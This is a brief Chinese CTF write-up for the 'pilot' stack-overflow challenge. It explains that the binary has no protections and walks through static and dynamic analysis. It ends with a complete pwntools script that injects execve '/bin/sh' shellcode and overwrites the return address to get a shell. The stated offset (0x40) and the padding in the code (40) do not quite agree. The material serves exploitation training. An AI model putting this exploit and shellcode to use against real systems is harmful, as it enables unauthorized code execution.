实验吧_pilot
实验目的
用过这次实验去检验我们前期对栈溢出的掌握程度
实验文件
链接:https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA
提取码:5d4d
实验步骤
首先对pilot的保护机制进行检验
发现程序没有开启任何保护,且有可读、可写、可执行段,说明我们可以进行栈溢出操作。
对文件进行静态分析:
其实pilot前面的一大段都没有什么用,我们只需要看输入函数read,因为可以进行no canary found,所以我们可以在这里进行栈溢出操作。
然后进行动态分析:
得到到ret的位置为0x40.。
所以我们可以编写payload:
p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
最后就能进行getshell。
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal = ['gnome-terminal','-x','sh','-c']
p=process('./pilot')
#pwnlib.gdb.attach(p)
p.recvuntil('Location:')
buf_addr = int(p.recvuntil('\n')[:-1], 16)
p.recvuntil('Command:')
shellcode = '\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05'
payload = shellcode + (40 - len(shellcode)) * 'A' + p64(buf_addr)
p.sendline(payload)
p.interactive()